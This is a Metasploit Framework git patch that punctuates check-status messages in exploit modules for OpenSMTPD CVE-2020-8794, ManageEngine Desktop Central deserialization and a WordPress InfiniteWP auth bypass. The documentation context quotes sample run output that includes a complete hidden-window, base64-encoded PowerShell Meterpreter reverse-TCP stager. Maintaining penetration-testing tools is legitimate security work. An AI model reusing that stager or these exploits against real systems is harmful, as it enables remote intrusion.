From dba1b6b00882ad78d0ae018a7002f9aea96204aa Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 8 Apr 2020 00:50:28 -0500 Subject: [PATCH] Punctuate check prints to match CheckCodes --- .../exploit/unix/local/opensmtpd_oob_read_lpe.md | 4 ++-- .../windows/http/desktopcentral_deserialization.md | 2 +- lib/msf/core/exploit/auto_check.rb | 6 +++--- modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb | 8 ++++---- .../exploits/unix/webapp/wp_infinitewp_auth_bypass.rb | 4 ++-- .../windows/http/desktopcentral_deserialization.rb | 10 +++++----- 6 files changed, 17 insertions(+), 17 deletions(-) diff --git a/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md b/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md index 35e8040bea0c5..6e3264253eede 100644 --- a/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md +++ b/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md @@ -61,7 +61,7 @@ msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Executing automatic check (disable AutoCheck to override) [*] OpenSMTPD 6.6.0 is using new grammar -[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794 +[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794. [*] Started service listener on 0.0.0.0:25 [*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true [*] Client 172.16.249.137:37747 connected @@ -106,7 +106,7 @@ msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Executing automatic check (disable AutoCheck to override) [*] OpenSMTPD 6.0.4 is using old grammar -[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794 +[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794. [*] Started service listener on 0.0.0.0:25 [*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true [*] Client 172.16.249.138:10203 connected diff --git a/documentation/modules/exploit/windows/http/desktopcentral_deserialization.md b/documentation/modules/exploit/windows/http/desktopcentral_deserialization.md index 031f0fa9c6a77..8a4f562209fdd 100644 --- a/documentation/modules/exploit/windows/http/desktopcentral_deserialization.md +++ b/documentation/modules/exploit/windows/http/desktopcentral_deserialization.md @@ -69,7 +69,7 @@ msf5 exploit(windows/http/desktopcentral_deserialization) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Executing automatic check (disable AutoCheck to override) [*] Detected Desktop Central version 100465 -[+] The target appears to be vulnerable. 100465 is an exploitable version +[+] The target appears to be vulnerable. 100465 is an exploitable version. [*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp [*] Powershell command length: 2502 [*] Serializing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAImual4CA7VWa2+bSBT9nEj5D6iyBCiOjV0nTSNV2gFDjGu7psSP2GutCAww8QAuDLFJt/9979iQptt0t11pERLzuM9zz8zFz2OXkSQWEuuy/Ub4fHJ8NHZSJxKk2pr6al4XarkiHx3Beu1+aAbCO0Faos2mm0QOiVdXV1qepjhmh3njGjOUZTi6owRnkiz8KcxCnOKzD3f32GXCZ6H2R+OaJncOLcUKzXFDLJyh2ON7g8R1eDgNe0MJk8Tffxfl5Vlr1dA/5Q7NJNEuMoajhkepKAtfZO7wpthgSRwSN02yxGeNGYlftxuTOHN8PAJrD3iIWZh4mShDFvCmmOVpLOzz4QYO25IIw3GauMjzUpxlYl1YctPL1eo3aVn6/ZjHjES4YcYMp8nGxukDcXHW6DmxR/FH7K9Ay2YpiYOVLIPYQ7LGUi3OKa0Lv2JGGuFthdrPKknPlUBqzFK5DoV8Ic9h4uUUHzTFFwI9FF+G50AAQO7LyfHJsV/RxX2rec/ZAqOj5X6MITppnGRkL/dOUOrCEPw4LEkLmNZu0hzLqydshVrkTOs/Vm9VslyyVzzC0nKaEG8FKmU9a87FoMvXf8zLLvZJjLtF7ETEragnvQQy9inep9ioxEYQlCSWG9jrYooDh3HYeK2/U9Mjwp501ZxQD6fIhUJlEBXUUP42mEMlJNGMhzgCiA5zIF/NB8LjSrokeVF553MQEjXqZFldGOdw4ty6YGOHYq8uoDgj5RbKWbIfil/DHeaUEdfJWGVuJVc4lv60JM5YmrtQNcj9xt5glziUQ1EXesTDamGToPIrvgiE5lAK5wAsPUAhYIUDYDPOhRRC5HWXGzZmZrShOAKR/ck3qBPAOS/JvueOE2BP/HuAFZkPzOVQVBg8Cw/qa9OE1YUpSRlcIBxWTqL/5P3ZzbGPQ0txWQipOh5LtWCc1LUd4nwsMdkjkDLI3kiTSHUyfNE53BHSq6ZOuufjbvKI4NGNj9ZUtSfThTn0+tQ2mX2rk8EkDE3SMgOYFxM9GDNl8/7mpte3uz2Udnehj8zM1HtqYbVU5PbIm2lfnUxAj2gD635nIk+Ngnlwq23NcTg3wZE2CMwAvqoZuqqyUAJVMbSBrYY6UVBgWz2r01qYzUuqkkfbtFFv9uTvyY/e6fTmuxs0GvZRaHzwjFbb2Ouvuf5ifT3o6vu5y+fWbaYTHfzoxq01DfFsulFnurGwphszON0G1nTQ7BihCusm2Q02dhOeVqv/EHuPQ3r5OIRwremiT/DCDHARIAsh+zam9t1WQ6rhpmr3HE2MCaytb8x4Z91thl5x22u+nQ4J3iTI0hEyKJzHCDnbbrM1S95b03Nroiu7YqLstvp9c6uT/nZdfifXFxdB0++Mm1PbjHtOqEK8Rb+zJv1T2AP6KLd+c8rx6+px8zGeU2estRJ612xNSPeNqpoE90dDl35SIWewcW7dJVrbDX2IyQwurWCexG1nDXZnAYLoID+os983QUfNKVlPTufcVn+rRP2dwuOM+pcQW7uMAbHYnDchPtTr2lp8bZvztocNtXnqvnvFGQuUrRV09IyKP+ohQyfNQocCRaE5VJeCkaRGed+PE8I1JOnwm7DGaYwpdFnow9XZQpQmLu83+9YAve7QgXhDnMDwdfvFkSw8Ccpf+1C1dHW1gDDhtO5QY4DjgIV1ZfdaUaCnKLuOAjn+fGJasikkMFTnHYnDcjBL92Zlfnpr6eye/M9glZdGCB/v38D6uvYPuz8FoFLfJ/zd6rcLvwTnr6c+cwgDURvuPYoPXfdlBEpmPPst4YWByvvlw/8rP+TsbAR/KyfHfwHyG93zwwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" diff --git a/lib/msf/core/exploit/auto_check.rb b/lib/msf/core/exploit/auto_check.rb index 474bd25bfbc22..8aa1bcfa349d5 100644 --- a/lib/msf/core/exploit/auto_check.rb +++ b/lib/msf/core/exploit/auto_check.rb @@ -31,13 +31,13 @@ def exploit print_warning(checkcode.message) when Exploit::CheckCode::Safe fail_with(Module::Failure::NotVulnerable, - "#{checkcode.message}. Disable AutoCheck to override.") + "#{checkcode.message} Disable AutoCheck to override.") when Exploit::CheckCode::Unsupported fail_with(Module::Failure::BadConfig, - "#{checkcode.message}. Disable AutoCheck to override.") + "#{checkcode.message} Disable AutoCheck to override.") else fail_with(Module::Failure::Unknown, - "#{checkcode.message}. Disable AutoCheck to override.") + "#{checkcode.message} Disable AutoCheck to override.") end end diff --git a/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb b/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb index 3a10ec25c42ca..de5fee834c604 100644 --- a/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb +++ b/modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb @@ -74,13 +74,13 @@ def check smtpd_help = cmd_exec('smtpd -h') if smtpd_help.empty? - return CheckCode::Unknown('smtpd(8) help could not be displayed') + return CheckCode::Unknown('smtpd(8) help could not be displayed.') end version = smtpd_help.scan(/^version: OpenSMTPD ([\d.p]+)$/).flatten.first unless version - return CheckCode::Unknown('OpenSMTPD version could not be found') + return CheckCode::Unknown('OpenSMTPD version could not be found.') end version = Gem::Version.new(version) @@ -95,11 +95,11 @@ def check end return CheckCode::Appears( - "OpenSMTPD #{version} appears vulnerable to CVE-2020-8794" + "OpenSMTPD #{version} appears vulnerable to CVE-2020-8794." ) end - CheckCode::Safe("OpenSMTPD #{version} is NOT vulnerable to CVE-2020-8794") + CheckCode::Safe("OpenSMTPD #{version} is NOT vulnerable to CVE-2020-8794.") end def exploit diff --git a/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb b/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb index deefe9a31bb2f..8f334659fe5cf 100644 --- a/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb +++ b/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb @@ -81,11 +81,11 @@ def check end unless (version = wordpress_version) - return CheckCode::Unknown('Could not detect WordPress version') + return CheckCode::Unknown('Could not detect WordPress version.') end if Gem::Version.new(version) >= Gem::Version.new('4.9') - return CheckCode::Safe("WordPress #{version} is an unsupported target") + return CheckCode::Safe("WordPress #{version} is an unsupported target.") end vprint_good("WordPress #{version} is a supported target") diff --git a/modules/exploits/windows/http/desktopcentral_deserialization.rb b/modules/exploits/windows/http/desktopcentral_deserialization.rb index 2f79a9c71ddaa..fa8a7661276c0 100644 --- a/modules/exploits/windows/http/desktopcentral_deserialization.rb +++ b/modules/exploits/windows/http/desktopcentral_deserialization.rb @@ -83,26 +83,26 @@ def check ) unless res - return CheckCode::Unknown('Target is not responding to check') + return CheckCode::Unknown('Target is not responding to check.') end unless res.code == 200 && res.body.include?('ManageEngine Desktop Central') - return CheckCode::Unknown('Target is not running Desktop Central') + return CheckCode::Unknown('Target is not running Desktop Central.') end version = res.get_html_document.at('//input[@id = "buildNum"]/@value')&.text unless version - return CheckCode::Detected('Could not detect Desktop Central version') + return CheckCode::Detected('Could not detect Desktop Central version.') end vprint_status("Detected Desktop Central version #{version}") if Gem::Version.new(version) < notes['PatchedVersion'] - return CheckCode::Appears("#{version} is an exploitable version") + return CheckCode::Appears("#{version} is an exploitable version.") end - CheckCode::Safe("#{version} is not an exploitable version") + CheckCode::Safe("#{version} is not an exploitable version.") end def exploit